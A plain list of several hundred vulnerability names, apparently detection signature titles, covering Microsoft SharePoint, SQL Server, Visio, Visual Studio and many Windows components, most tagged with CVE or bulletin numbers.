Microsoft-Sharepoint-Remote-File-Disclosure-Vulnerability
Microsoft-Sharepoint-Server-Access-Control-Vulnerability
Microsoft-Sharepoint-Server-Business-Data-Connectivity-Unsafe-Reflection
Microsoft-SharePoint-Server-ChartWebPartDataStorage-Insecure-Deserialization
Microsoft-SharePoint-Server-ExecuteBdcMethod-Unsafe-Reflection-CVE-2024-38227
Microsoft-Sharepoint-Server-Generateproxyassembly-Code-Injection-CVE-2023-24955
Microsoft-Sharepoint-Server-help.aspx-Denial-Of-Service
Microsoft-SharePoint-Server-RCE-CVE-2021-1707
Microsoft-Sharepoint-Server-Remote-Code-Execution-CVE-2021-26420
Microsoft-Sharepoint-Server-Remote-Code-Execution-CVE-2025-21400
Microsoft-Sharepoint-Server-Remote-Code-Execution-CVE-2025-29794
Microsoft-Sharepoint-Server-Stored-Cross-Site-Scripting
Microsoft-Sharepoint-Server-Subscribe-Unsafe-Reflection
Microsoft-Sharepoint-Server-Unsafe-Deserialization-CVE-2024-30044
Microsoft-Sharepoint-Server-Unsafe-Reflection-CVE-2024-38023
Microsoft-Sharepoint-Server-Unsafe-Reflection-CVE-2024-38024
Microsoft-SharePoint-Server-Web-Parts-RCE
Microsoft-Sharepoint-Username-Sanitization-Cross-Site-Scripting
Microsoft-Sharepoint-Workflow-Isgoodworkflowcore-Insecure-Deserialization
Microsoft-Sharepoint-Workflow-Isgoodworkflowcore-Insecure-Deserialization-2
Microsoft-SharePoint-XML-External-Entity-CVE-2021-24072
Microsoft-Sharepoint-Xml-Handling-Remote-File-Disclosure
Microsoft-Sharepoint-XSS-CVE-2012-0017
Microsoft-Sharepoint-XSS-CVE-2012-0144
Microsoft-Sharepoint-XSS-CVE-2012-0145
Microsoft-SharePoint-XSS-CVE-2012-1859
Microsoft-Sharepoint-XSS-Vulnerability
Microsoft-SharePoint-XSS-Vulnerability-CVE-2013-0083
Microsoft-Sharepoint-XSS-Vulnerability-CVE-2014-1754
Microsoft-Silverlight-Pointer-Handling-Memory-Corruption
Microsoft-Silverlight-Vulnerability-CVE-2016-0034
Microsoft-Silverlight-Writeablebitmap-Setsource-Information-Disclosure
Microsoft-SMTP-Server-DNS-Handling-Vulnerability
Microsoft-SQL-Server-Backup-Restoring-Memory-Corruption
Microsoft-SQL-Server-Blank-Sa-Password-Usage
Microsoft-SQL-Server-Payload-Execution
Microsoft-SQL-Server-Reflected-XSS
Microsoft-SQL-Server-Reporting-Services-ViewState-RCE
Microsoft-SQL-Server-Xp-Cmdshell-Command-Execution
Microsoft-Step-By-Step-Interactive-Training-Bookmark-Link-File-BOF
Microsoft-System-Center-Configuration-Manager-Cross-Site-Scripting
Microsoft-System-Center-Configuration-Manager-Vulnerability
Microsoft-Systems-Management-Server-DoS
Microsoft-Tablet-Input-Band-Object-Handling-Use-After-Free
Microsoft-TCP-IP-Denial-Of-Service-CVE-2021-24086
Microsoft-TCP-IP-Remote-Code-Execution-CVE-2021-24074
Microsoft-TCP-IP-Remote-Code-Execution-CVE-2021-24094
Microsoft-TCP-Timestamp-Memory-Corruption
Microsoft-Text-To-Speech-CVE-2018-8634
Microsoft-Time-Remote-Code-Execution-CVE-2011-3397
Microsoft-VBA-Insecure-Library-Loading-CVE-2012-1854
Microsoft-VBA6-Stack-Memory-Corruption
Microsoft-VBScript-RCE-CVE-2018-8174
Microsoft-VBScript-Scripting-Engine-CVE-2014-6363
Microsoft-Video-ActiveX-Control-Stack-Buffer-Overflow
Microsoft-Video-ActiveX-Control-Stack-Buffer-Overflow-MS09-037
Microsoft-Visio-DXF-File-Handling-Code-Execution
Microsoft-Visio-DXF-File-Inserting-Buffer-Overflow
Microsoft-Visio-External-Entities-Resolution-Vulnerability
Microsoft-Visio-Insecure-Library-Loading-Vulnerability-CVE-2010-3148
Microsoft-Visio-Version-Number-Handling-Code-Execution
Microsoft-Visio-Viewer-VSD-File-Memory-Corruption
Microsoft-Visio-VSD-File-Format-Memory-Corruption-CVE-2012-0019
Microsoft-Visio-VSD-File-Format-Memory-Corruption-CVE-2012-0020
Microsoft-Visio-VSD-File-Format-Memory-Corruption-CVE-2012-0136
Microsoft-Visual-Basic-Common-ActiveX-Control-AVI-Parsing
Microsoft-Visual-Basic-Enterprise-Vb6stkit.dll-Buffer-Overflow
Microsoft-Visual-Basic-Flexgrid-ActiveX-Control-Integer-Overflow
Microsoft-Visual-Basic-Flexgrid-ActiveX-Control-Memory-Corruption
Microsoft-Visual-Foxpro-Fpole.ocx-ActiveX-Control-BOF
Microsoft-Visual-Studio-Code-Maven-For-Java-Extension-Command-Injection
Microsoft-Visual-Studio-Code-Maven-For-Java-Extension-Remote-Code-Execution
Microsoft-Visual-Studio-Code-Remote-Containers-Extension-RCE
Microsoft-Visual-Studio-Code-Remote-Containers-Extension-Remote-Code-Execution
Microsoft-Visual-Studio-DDS-File-Parsing-Heap-Buffer-Overflow
Microsoft-Visual-Studio-MFC-Insecure-Library-Loading
Microsoft-Visual-Studio-MSMASK32.OCX-ActiveX-Control-BOF
Microsoft-Visual-Studio-PDWizard.ocx-ActiveX-Control-Code-Execution
Microsoft-Visual-Studio-PDWizard.ocx-ActiveX-Control-Memory-Corruption
Microsoft-Visual-Studio-Project-Name-BOF
Microsoft-Visual-Studio-Python-Interpreter-RCE
Microsoft-Visual-Studio-Team-Web-Access-Console-Vulnerability
Microsoft-VM-ActiveX-Component-Vulnerability
Microsoft-VSCode-Markdown-Preview-Enhanced-Extension-Command-Injection
Microsoft-Windows-2000-Domain-Authentication-Bypass
Microsoft-Windows-Active-Directory-Browser-Election-Buffer-Overflow
Microsoft-Windows-Active-Directory-Buffer-Overflow
Microsoft-Windows-Active-Directory-Certificate-Services-CVE-2011-1264
Microsoft-Windows-Active-Directory-Crafted-LDAP-Request-Buffer-Overflow
Microsoft-Windows-Active-Directory-Denial-Of-Service
Microsoft-Windows-Active-Directory-Integrated-DNS-Remote-Code-Execution
Microsoft-Windows-Active-Directory-LDAP-Parsing-Memory-Corruption
Microsoft-Windows-Active-Directory-Ldaps-Authentication-Bypass
Microsoft-Windows-ActiveX-Data-Objects-Code-Execution
Microsoft-Windows-Address-Book-Contact-File-Parsing-CVE-2020-1410
Microsoft-Windows-Address-Book-Insecure-Library-Loading-CVE-2010-3147
Microsoft-Windows-ADIDNS-Information-Disclosure
Microsoft-Windows-ADO-Record-Memory-CVE-2011-0027
Microsoft-Windows-Adobe-Font-Driver-CVE-2015-0091-Memory-Corruption
Microsoft-Windows-Adobe-Font-Driver-CVE-2015-0092-Memory-Corruption
Microsoft-Windows-Ancillary-Function-Driver-Elevation-CVE-2011-1249
Microsoft-Windows-And-Office-TIFF-Handling-GDI-Memory-Corruption
Microsoft-Windows-Animation-Manager-CVE-2016-7205-Memory-Corruption
Microsoft-Windows-ASX-File-Parsing-Remote-Buffer-Overflow
Microsoft-Windows-ATMFD.DLL.Kernel-Code-Execution-Vulnerability
Microsoft-Windows-Authentication-Kerberos-NTLM-Fallback-Security-Bypass
Microsoft-Windows-AVI-File-Chunck-Length-Integer-Overflow
Microsoft-Windows-Backup-Manager-Insecure-Library-Loading-CVE-2010-3145
Microsoft-Windows-BranchCache-Insecure-Library-Loading-CVE-2010-3966
Microsoft-Windows-Briefcase-Integer-Overflow-Vulnerability
Microsoft-Windows-Briefcase-Integer-Underflow-Vulnerability
Microsoft-Windows-Browser-Election-Buffer-Overflow
Microsoft-Windows-Cab-File-Parsing-Directory-Traversal
Microsoft-Windows-Cinepak-Codec-Code-Execution
Microsoft-Windows-CLDAP-Out-Of-Bounds-Read-CVE-2024-49113
Microsoft-Windows-Codecs-Library-Information-Disclosure
Microsoft-Windows-Color-Control-Panel-Insecure-Library-Loading-CVE-2010-5082
Microsoft-Windows-Common-Control-Library-Heap-Buffer-Overflow
Microsoft-Windows-Common-Controls-Remote-Code-Execution-Vulnerability
Microsoft-Windows-Comsvcs.dll-Insecure-Library-Loading
Microsoft-Windows-Contacts-Fnsummaryproc-Remote-Code-Execution
Microsoft-Windows-Credssp-MITM-Code-Execution
Microsoft-Windows-CryptoAPI-Spoofing-Vulnerability
Microsoft-Windows-CryptoAPI-X.509-Object-Identifiers-Spoofing-Vulnerability
Microsoft-Windows-CVE-2012-0013-Insecure-ClickOnce-Application
Microsoft-Windows-Devicemetadata-Path-Traversal
Microsoft-Windows-DFS-Memory-Corruption-CVE-2011-1868
Microsoft-Windows-DHCP-Client-CVE-2019-0547-Code-Execution
Microsoft-Windows-DHCP-Client-Dhcpextractfulloptions-Code-Execution
Microsoft-Windows-DHCP-Client-Out-Of-Bounds-Read-CVE-2025-21179
Microsoft-Windows-DHCP-Client-Service-Buffer-Overflow
Microsoft-Windows-DHCP-Server-Code-Execution-CVE-2019-0626
Microsoft-Windows-DHCP-Server-Failover-CVE-2023-38162-Denial-Of-Service
Microsoft-Windows-DHCP-Server-Failover-DoS
Microsoft-Windows-DHCP-Server-Failover-Remote-Code-Execution
Microsoft-Windows-DHCP-Server-Remote-Code-Execution
Microsoft-Windows-DHCP-Server-UncodeOption-Heap-Buffer-Overflow-CVE-2019-0626
Microsoft-Windows-Dhcpv6-Client-Parsedhcpv6options-Code-Execution
Microsoft-Windows-DirectShow-Insecure-Library-Loading-CVE-2011-0032
Microsoft-Windows-DirectShow-JPEG-Double-Free
Microsoft-Windows-DirectX-Information-Disclosure-CVE-2018-8563
Microsoft-Windows-DLL-Hijack-Vulnerability
Microsoft-Windows-DNS-Client-Buffer-Overrun
Microsoft-Windows-DNS-Client-Service-CVE-2011-0657
Microsoft-Windows-DNS-Insufficient-Socket-Entropy-Vulnerability
Microsoft-Windows-DNS-Server-Remote-Code-Execution-CVE-2020-1350
Microsoft-Windows-DNS-Server-RPC-Management-Interface-Buffer-Overflow
Microsoft-Windows-DNS-Server-Spoofing-Vulnerability
Microsoft-Windows-Dnsapi-NSEC3-Heap-Based-Buffer-Overflow
Microsoft-Windows-Domain-Controller-Zerologon-CVE-2020-1472
Microsoft-Windows-Domain-User-Code-Execution
Microsoft-Windows-DVR-MS-CVE-2011-0042
Microsoft-Windows-Els.dll-Insecure-Library-Loading
Microsoft-Windows-Embedded-OpenType-Font-Engine-Lzcomp-Integer-Overflow
Microsoft-Windows-EOT-Font-Engine-Information-Disclosure-Vulnerability
Microsoft-Windows-EOT-Font-Engine-Information-Disclosure-Vulnerability-2
Microsoft-Windows-Event-Viewer-Information-Disclosure
Microsoft-Windows-Exchange-System-Attendant-Denial-Of-Service
Microsoft-Windows-Explorer-CFileSysEnum-Directory-Traversal
Microsoft-Windows-Explorer-Invalid-Url-File-Parsing-Stack-Overflow
Microsoft-Windows-Explorer-Web-View-Script-Execution
Microsoft-Windows-Fax-Services-Cover-Editor-Memory-Corruption
Microsoft-Windows-Fax-Services-Cover-Page-Editor-Heap-Buffer-Overflow
Microsoft-Windows-File-Explorer-Command-File-NTLM-Relay-Vulnerability
Microsoft-Windows-File-Handling-Component-Remote-Code-Execution
Microsoft-Windows-Font-Library-File-Buffer-Overflow
Microsoft-Windows-Font-Library-Remote-Code-Execution
Microsoft-Windows-Font-Parsing-CVE-2012-2897
Microsoft-Windows-GDI-Access-Violation-CVE-2011-5046
Microsoft-Windows-GDI-EMF-Polyline-Buffer-Overflow
Microsoft-Windows-GDI-EMR_setpixelv-Handling-Information-Disclosure
Microsoft-Windows-GDI-Information-Disclosure
Microsoft-Windows-GDI-Metafile-Image-Handling-Heap-Overflow
Microsoft-Windows-GDI-WMF-File-Headersize-Buffer-Overflow
Microsoft-Windows-Gdiplus-EMF-Handling-Integer-Overflow
Microsoft-Windows-Gdiplus-Gpfont.setdata-Integer-Overflow
Microsoft-Windows-Gdiplus-PNG-Processing-Integer-Overflow
Microsoft-Windows-Gdiplus-TIFF-Parsing-Buffer-Overflow
Microsoft-Windows-Gdiplus-WMF-Integer-Overflow
Microsoft-Windows-Graphics-Component-Createcolorspace-EMF-Out-Of-Bounds-Read
Microsoft-Windows-Graphics-Component-CVE-2016-3301-Code-Execution
Microsoft-Windows-Graphics-Component-CVE-2016-3303-Code-Execution
Microsoft-Windows-Graphics-Component-CVE-2016-3304-Code-Execution
Microsoft-Windows-Graphics-Component-CVE-2017-11816-Information-Disclosure
Microsoft-Windows-Graphics-Component-Information-Disclosure-CVE-2018-8239
Microsoft-Windows-Graphics-Component-Meta_Setdibtodev-Information-Disclosure
Microsoft-Windows-Graphics-Component-Remote-Code-Execution
Microsoft-Windows-Graphics-Device-Integer-Overflow-Vulnerability
Microsoft-Windows-Graphics-Device-Interface-EMR_Header-Information-Disclosure
Microsoft-Windows-Graphics-Device-Interface-Information-Disclosure
Microsoft-Windows-Graphics-Device-Interface-Integer-Overflow
Microsoft-Windows-Graphics-Device-Interface-Out-Of-Bounds-Access
Microsoft-Windows-Graphics-Rendering-Engine-EMF-Parsing-Memory-Corruption
Microsoft-Windows-Graphics-Rendering-Engine-Gif-Parsing-Buffer-Overflow
Microsoft-Windows-Graphics-Rendering-Engine-VML-BOF
Microsoft-Windows-Graphics-Rendering-Engine-WMF-Polygon-Parsing-BOF
Microsoft-Windows-GRE-WMF-Handling-Memory-Read-Exception
Microsoft-Windows-HLP-File-Handling-Heap-Buffer-Overflow
Microsoft-Windows-HTTP.sys-DoS-CVE-2022-35748
Microsoft-Windows-IKE-Ikeinitmmresponderphase1-Null-Pointer-Dereference
Microsoft-Windows-IKE-Vendor-Id-CVE-2023-21547-Null-Pointer-Dereference
Microsoft-Windows-Image-ICC-Profile-Code-Execution
Microsoft-Windows-Imaging-API-Use-After-Free
Microsoft-Windows-Insecure-Library-Loading
Microsoft-Windows-Insecure-Library-Loading-CVE-2012-2519
Microsoft-Windows-Integer-Underflow-CVE-2015-6130
Microsoft-Windows-Internet-Key-Exchange-Protocol-Extensions-Denial-of-Service
Microsoft-Windows-Internet-Printing-Service-Integer-Overflow
Microsoft-Windows-Internet-Shortcut-File-Security-Feature-Bypass-CVE-2023-36025
Microsoft-Windows-Internet-Shortcut-File-Security-Feature-Bypass-CVE-2024-21412
Microsoft-Windows-IP-Validation-Vulnerability
Microsoft-Windows-IPv6-DoS-Vulnerability-CVE-2014-0254
Microsoft-Windows-IPv6-Router-Advertisement-Stack-Buffer-Overflow
Microsoft-Windows-iSCSI-Target-CVE-2014-0255-Denial-Of-Service
Microsoft-Windows-ITS-Protocol-Information-Disclosure-Vulnerability
Microsoft-Windows-Itss.dll-CHM-File-Handling-Heap-Corruption
Microsoft-Windows-Jet-Database-CVE-2019-0891-Remote-Code-Execution
Microsoft-Windows-Jet-Database-CVE-2019-1242-Remote-Code-Execution
Microsoft-Windows-Jet-Database-CVE-2019-1243-Remote-Code-Execution
Microsoft-Windows-Jet-Database-CVE-2019-1249-RCE
Microsoft-Windows-Jet-Database-CVE-2019-1250-RCE
Microsoft-Windows-Jet-Database-CVE-2019-1358-RCE
Microsoft-Windows-Jet-Database-CVE-2019-1359-Out-Of-Bounds-Write
Microsoft-Windows-Jet-Database-CVE-2019-1406-Off-By-One
Microsoft-Windows-Jet-Database-Engine-Code-Execution
Microsoft-Windows-Jet-Database-Engine-Createlvsmlocs-Code-Execution
Microsoft-Windows-Jet-Database-Engine-CVE-2020-1074-Remote-Code-Execution
Microsoft-Windows-Jet-Database-Engine-Physical-Index-Out-Of-Bounds-Read
Microsoft-Windows-KDC-Proxy-KpsSocketRecvDataIoCompletion-Integer-Overflow
Microsoft-Windows-Kerberos-KDC-Privilege-Escalation
Microsoft-Windows-Kernel-SMB2-DOS
Microsoft-Windows-Kodak-Image-Viewer-Code-Execution
Microsoft-Windows-Lanman-Denial-Of-Service
Microsoft-Windows-LDAP-Remote-Code-Execution-Vulnerability-CVE-2025-21376
Microsoft-Windows-LDAP-Searchresultdone-Integer-Overflow-CVE-2024-49112
Microsoft-Windows-Libarchive-Execute_Filter_e8-Integer-Overflow
Microsoft-Windows-Libarchive-Run_Filters-Heap-Buffer-Overflow
Microsoft-Windows-License-Logging-Service-Buffer-Overflow-CVE-2005-0050
Microsoft-Windows-LNK-NTLM-Relay
Microsoft-Windows-LNK-Remote-Code-Execution
Microsoft-Windows-LNK-Remote-Code-Execution-CVE-2020-1421
Microsoft-Windows-LSASS-Recursive-Stack-Overflow
Microsoft-Windows-Mail-Remote-Code-Execution-CVE-2011-2016
Microsoft-Windows-Mailslot-Heap-Overflow
Microsoft-Windows-Mapurltozone-Security-Feature-Bypass-CVE-2025-21189
Microsoft-Windows-Mapurltozone-Security-Feature-Bypass-CVE-2025-21219
Microsoft-Windows-Mapurltozone-Security-Feature-Bypass-CVE-2025-21268
Microsoft-Windows-Media-ASF-Header-Parsing-Invalid-Free
Microsoft-Windows-Media-Center-Insecure-Library-Loading
Microsoft-Windows-Media-Center-MCL-File-Code-Execution
Microsoft-Windows-Media-CVE-2016-0101-Code-Execution
Microsoft-Windows-Media-Device-Manager-Insecure-Library-Loading
Microsoft-Windows-Media-Encoder-9-ActiveX-Control-Buffer-Overflow
Microsoft-Windows-Media-Encoder-Insecure-Library-Loading-CVE-2010-3965
Microsoft-Windows-Media-Format-ASF-Parsing-Code-Execution
Microsoft-Windows-Media-Foundation-Memory-Corruption-CVE-2020-16915
Microsoft-Windows-Media-Foundation-Mfasfsrcsnk.dll-Type-Confusion
Microsoft-Windows-Media-MIDI-File-Memory-Corruption
Microsoft-Windows-Media-Playback-Memory-Corruption
Microsoft-Windows-Media-Player-Code-Execution-MS09-052
Microsoft-Windows-Media-Player-DVR-MS-Memory-Corruption
Microsoft-Windows-Media-Player-File-Information-Disclosure
Microsoft-Windows-Media-Player-Media-Library-Manipulation
Microsoft-Windows-Media-Player-PNG-Image-Parsing-Buffer-Overflow
Microsoft-Windows-Media-Player-Skin-Parsing-Code-Execution
Microsoft-Windows-Message-Queuing-Service-DoS-CVE-2023-21769
Microsoft-Windows-Message-Queuing-Service-DoS-CVE-2023-28302
Microsoft-Windows-Message-Queuing-Service-SRMP-DoS-CVE-2023-36606
Microsoft-Windows-Messenger-ActiveX-Control-CVE-2011-1243
Microsoft-Windows-Messenger-ActiveX-Information-Disclosure
Microsoft-Windows-Metafile-Setpalette-Entries-Heap-Overflow
Microsoft-Windows-MF3216-Component-Heap-Based-Buffer-Overflow
Microsoft-Windows-MFC-Document-Title-Updating-Buffer-Overflow
Microsoft-Windows-MFC-Library-FileFind-Class-Heap-Overflow
Microsoft-Windows-MHTML-Information-Disclosure-CVE-2011-0096
Microsoft-Windows-MIDI-Remote-Code-Execution-Vulnerability
Microsoft-Windows-Mjpeg-Media-Decompression-Code-Execution
Microsoft-Windows-MOTW-Security-Feature-Bypass-CVE-2024-30050
Microsoft-Windows-Movie-Maker-And-Producer-Buffer-Overflow
Microsoft-Windows-Movie-Maker-Insecure-Library-Loading-CVE-2010-3967
Microsoft-Windows-Movie-Maker-Mediaclipstring-Buffer-Overflow
Microsoft-Windows-MQ-Service-CVE-2025-21285-Null-Pointer-Dereference
Microsoft-Windows-MSCOMCTL.OCX-RCE-Vulnerability
Microsoft-Windows-MSHTML-File-Extension-Spoofing-Remote-Code-Execution
Microsoft-Windows-MSHTML-Platform-Remote-Code-Execution-CVE-2023-35628
Microsoft-Windows-MSI-File-Signature-Spoofing-Vulnerability
Microsoft-Windows-Msvcrt.dll-Buffer-Overflow-CVE-2012-0150
Microsoft-Windows-NAT-Driver-Denial-Of-Service
Microsoft-Windows-NAT-Helper-DNS-Query-Denial-Of-Service
Microsoft-Windows-Network-File-System-CVE-2022-30136-Remote-Code-Execution
Microsoft-Windows-NFS-CVE-2022-26937
Microsoft-Windows-NFS-CVE-2022-34715-RCE-Vulnerability
Microsoft-Windows-NFS-Server-CVE-2020-17047
Microsoft-Windows-NFS-Server-CVE-2020-17051
Microsoft-Windows-NFS-Server-CVE-2020-17056
Microsoft-Windows-Nfs-Server-Null-Pointer-Dereference
Microsoft-Windows-NFS-Server-RCE-CVE-2021-26432
Microsoft-Windows-NT-4.0-DHCP-Server-Buffer-Overflow
Microsoft-Windows-NTLM-Hash-Disclosure-Vulnerability-CVE-2025-21377
Microsoft-Windows-NTLM-Message-Integrity-Check-Tampering
Microsoft-Windows-NTLM-Relay-CVE-2025-24054
Microsoft-Windows-Object-Packager-Remote-Code-Execution
Microsoft-Windows-OLE-Automation-Heap-Overrun
Microsoft-Windows-OLE-CVE-2014-6332
Microsoft-Windows-OLE-CVE-2016-0091-Code-Execution
Microsoft-Windows-OLE-CVE-2016-0092-Code-Execution
Microsoft-Windows-OLE-CVE-2016-0153-Code-Execution
Microsoft-Windows-OLE-CVE-2017-8487-Global-Buffer-Overflow
Microsoft-Windows-OLE-Packer-Remote-Code-Execution
Microsoft-Windows-OpenType-Compact-Font-Format-Driver-Code-Execution
Microsoft-Windows-OpenType-Font-Memory-Corruption
Microsoft-Windows-OpenType-Font-Parsing-Heap-Overflow
Microsoft-Windows-OpenType-Font-Parsing-Stack-Overflow
Microsoft-Windows-OpenType-Font-Validation-Integer-Overflow
Microsoft-Windows-OTF-Fonts-Kernel-Vulnerability-CVE-2015-2426
Microsoft-Windows-PDF-Library-CVE-2016-0117-Code-Execution
Microsoft-Windows-PDF-Library-CVE-2016-3319-Memory-Corruption
Microsoft-Windows-PDF-Library-Heap-Based-Buffer-Overflow
Microsoft-Windows-PDF-Library-PostScript-Information-Disclosure
Microsoft-Windows-PE-File-DVRT-Parsing-Denial-Of-Service
Microsoft-Windows-PE-File-Signature-Spoofing-Vulnerability
Microsoft-Windows-PGM-Handling-Remote-Code-Execution
Microsoft-Windows-PGM-PARITY_PRM_TGS-Handling-Code-Execution
Microsoft-Windows-PnP-Buffer-Overflow
Microsoft-Windows-PPTP-CVE-2022-23270
Microsoft-Windows-PPTP-Protocol-Denial-Of-Service
Microsoft-Windows-Pragmatic-General-Multicast-Allocatedatabuffer-Use-After-Free
Microsoft-Windows-Pragmatic-General-Multicast-Packet-Length-Integer-Underflow
Microsoft-Windows-Print-Spooler-RCE-CVE-2021-34527
Microsoft-Windows-Print-Spooler-Service-Buffer-Overflow-CVE-2009-0228
Microsoft-Windows-QUIC-Transport-Parameters-Handling-Resource-Exhaustion
Microsoft-Windows-QUIC-Version-Negotiation-Packet-Handling-Denial-Of-Service
Microsoft-Windows-Rdl-Service-Base24-Decoding-Remote-Code-Execution
Microsoft-Windows-Rdl-Service-Tlsrpcchallengeserver-Handling-Two-Vulnerabilities
Microsoft-Windows-RDS-DVC-Decompression-Heap-Buffer-Overflow
Microsoft-Windows-Remote-Assistance-Xxe-Injection-Information-Disclosure
Microsoft-Windows-Remote-Code-Execution-CVE-2016-0015
Microsoft-Windows-Remote-Code-Execution-CVE-2016-0016
Microsoft-Windows-Remote-Code-Execution-CVE-2016-0018
Microsoft-Windows-Remote-Code-Execution-CVE-2018-8475
Microsoft-Windows-Remote-Desktop-Gateway-CVE-2020-0610-Code-Execution
Microsoft-Windows-Remote-Desktop-Licensing-Service-Arbitrary-File-Deletion
Microsoft-Windows-Remote-Desktop-Licensing-Service-Buffer-Overread
Microsoft-Windows-Remote-Desktop-Licensing-Service-Improper-Authentication
Microsoft-Windows-Remote-Desktop-Protocol-Denial-of-Service
Microsoft-Windows-Remote-Desktop-Protocol-Vulnerability-CVE-2015-2373
Microsoft-Windows-Remote-Desktop-Protocol-Websocketserver-Use-After-Free
Microsoft-Windows-Remote-Desktop-Services-Heap-Buffer-Overflow
Microsoft-Windows-Remote-Desktop-Usage
Microsoft-Windows-Remote-Procedure-Call-Vulnerability
Microsoft-Windows-Resource-URI-Win32-API-Code-Execution-Vulnerability
Microsoft-Windows-RPC-Runtime-Processbindackornak-Integer-Overflow
Microsoft-Windows-RRAS-Service-Out-Of-Bounds-Access
Microsoft-Windows-Schannel-Buffer-Overflow
Microsoft-Windows-Scripting-Engines-Information-Disclosure-CVE-2011-0031
Microsoft-Windows-Scripting-Engines-Script-Encoding
Microsoft-Windows-Search-Information-Disclosure
Microsoft-Windows-Search-Protocol-Handler-Command-Execution
Microsoft-Windows-Search-Type-Confusion
Microsoft-Windows-Security-Feature-Bypass-CVE-2024-38217
Microsoft-Windows-Server-Driver-Crafted-SMB-Packet-DoS
Microsoft-Windows-Server-Service-Authorization-Weakness
Microsoft-Windows-Server-Service-SMB-Rename-Code-Execution
Microsoft-Windows-Sharepoint-Services-Cross-Site-Scripting
Microsoft-Windows-Shell-File-Name-Code-Execution
Microsoft-Windows-Shell-Graphics-Thumbnail-Image-Integer-Overflow
Microsoft-Windows-Shell-Vulnerability
Microsoft-Windows-Shell-Zip-File-Remote-Code-Execution
Microsoft-Windows-ShellExecute-And-IE7-Url-Handling-Code-Execution
Microsoft-Windows-SmartScreen-Security-Feature-Bypass-CVE-2022-44698
Microsoft-Windows-SMB-Authentication-Reflection-Remote-Code-Execution
Microsoft-Windows-Smb-Client-Message-Size-Vulnerability
Microsoft-Windows-SMB-Client-Pool-Corruption
Microsoft-Windows-SMB-Client-Race-Condition
Microsoft-Windows-Smb-Client-Response-Parsing-Memory-Corruption
Microsoft-Windows-SMB-Client-Transaction-BOF-CVE-2010-0270
Microsoft-Windows-SMB-Information-Disclosure-Vulnerability-CVE-2021-28324
Microsoft-Windows-SMB-Information-Disclosure-Vulnerability-CVE-2021-28325
Microsoft-Windows-SMB-Negoex-Buffer-Overflow
Microsoft-Windows-SMB-Negotiate-Request-Remote-Code-Execution
Microsoft-Windows-SMB-Search-Request-Buffer-Overflow
Microsoft-Windows-SMB-Server-Denial-Of-Service-CVE-2010-0022
Microsoft-Windows-SMB-Server-Ntlm-Authentication-Lack-Of-Entropy
Microsoft-Windows-SMB-Server-Remote-Code-Execution-CVE-2010-0020
Microsoft-Windows-Smb-Server-Smbv1-CVE-2017-0143-Memory-Corruption
Microsoft-Windows-Smb-Server-Smbv1-CVE-2017-0144-Memory-Corruption
Microsoft-Windows-SMB-Server-Smbv1-CVE-2017-0145-Buffer-Overflow
Microsoft-Windows-Smb-Server-Smbv1-CVE-2017-0146-RCE
Microsoft-Windows-SMB-Server-Smbv1-Information-Disclosure
Microsoft-Windows-SMB-Server-Smbv1-Information-Disclosure-2
Microsoft-Windows-SMB-Server-Smbv1-Out-Of-Bounds-Read
Microsoft-Windows-Smb-Server-Smbv1-Out-Of-Bounds-Read-CVE-2017-11781
Microsoft-Windows-SMB-Service-Buffer-Overflow-MS08-063
Microsoft-Windows-SMB-Transaction-CVE-2011-0661
Microsoft-Windows-SMB2-DFS-DOS
Microsoft-Windows-SMB2-Response-Parsing-Vulnerability-CVE-2011-1268
Microsoft-Windows-SMB2-Write-DOS-CVE-2011-1267
Microsoft-Windows-Smbv1-CVE-2017-0147-Information-Disclosure
Microsoft-Windows-SMBv2-Smb2updateleasefilename-Code-Execution
Microsoft-Windows-SMBv3-Compression-Information-Disclosure
Microsoft-Windows-SMTP-Service-DNS-Response-Spoofing
Microsoft-Windows-SMTP-Service-MX-Record-Denial-Of-Service
Microsoft-Windows-SNMP-CVE-2018-0967-Denial-Of-Service
Microsoft-Windows-Ssl-And-Tls-Security-Feature-Bypass
Microsoft-Windows-StructuredQuery-RCE-Vulnerability-CVE-2018-0825
Microsoft-Windows-StructuredQuery-Uninitialized-Pointer-Remote-Code-Execution
Microsoft-Windows-Support-Diagnostic-Tool-Path-Traversal-CVE-2022-34713
Microsoft-Windows-TCP-FIN-WAIT-Vulnerability
Microsoft-Windows-TCP-IP-Stack-Url-Based-Qos-Denial-Of-Service
Microsoft-Windows-TCP-Stack-Zero-Window-Size-Vulnerability
Microsoft-Windows-Telnet-Credential-Reflection-Vulnerability
Microsoft-Windows-Themes-CVE-2024-38030-NTLM-Relay
Microsoft-Windows-Themes-CVE-2025-21308-NTLM-Relay
Microsoft-Windows-Themes-Reviseversionifnecessary-Race-Condition
Microsoft-Windows-TLS-Key-Exchange-Denial-Of-Service
Microsoft-Windows-TPC-IP-Denial-Of-Service-CVE-2020-16899
Microsoft-Windows-TPC-IP-Remote-Code-Execution-CVE-2020-16898
Microsoft-Windows-TrueType-Font-File-Parsing-Remote-Code-Execution
Microsoft-Windows-TrueType-Font-Parsing-CVE-2011-3402
Microsoft-Windows-Type1-Font-Parsing-Remote-Code-Execution
Microsoft-Windows-Uniscribe-Integer-Overflow
Microsoft-Windows-UPnP-Service-Remote-Code-Execution
Microsoft-Windows-URI-Handler-Remote-Code-Execution
Microsoft-Windows-VBScript-Engine-Dynamic-Array-Use-After-Free
Microsoft-Windows-VBScript-Engine-Information-Disclosure
Microsoft-Windows-VBScript-Help-File-Code-Execution
Microsoft-Windows-VBScript-Regular-Expression-Information-Disclosure
Microsoft-Windows-Vista-Contacts-Gadget-Code-Execution
Microsoft-Windows-Vista-Feed-Headlines-Gadget-Code-Execution
Microsoft-Windows-Vista-Windows-Mail-File-Execution
Microsoft-Windows-Vulnerability-CVE-2017-0016
Microsoft-Windows-Vulnerability-CVE-2020-17140
Microsoft-Windows-Wab32res.dll-Insecure-Library-Loading
Microsoft-Windows-WebDAV-Mini-Redirector-Buffer-Overflow
Microsoft-Windows-WebDav-Mini-Redirector-Heap-Buffer-Overflow
Microsoft-Windows-Wimgapi-Readintegrityinfo-Heap-Buffer-Overflow
Microsoft-Windows-Win32k-EOT-Parsing-Integer-Overflow
Microsoft-Windows-Win32k.sys-Memory-Corruption
Microsoft-Windows-Windows-Script-Host-Command-Injection
Microsoft-Windows-WinVerifyTrust-PE-Validation-Security-Bypass
Microsoft-Windows-WinVerifyTrust-Signature-Validation-CVE-2012-0151
Microsoft-Windows-WMF-File-Parsing-DOS
Microsoft-Windows-WordPad-Converter-Parsing-Memory-Corruption
Microsoft-Windows-Workstation-Service-NetrGetJoinInformation-Heap-Corruption
Microsoft-Windows-Workstation-Service-NetrWkstaUserEnum-DoS
Microsoft-Windows-Write-AndX-SMB-Processing-DOS
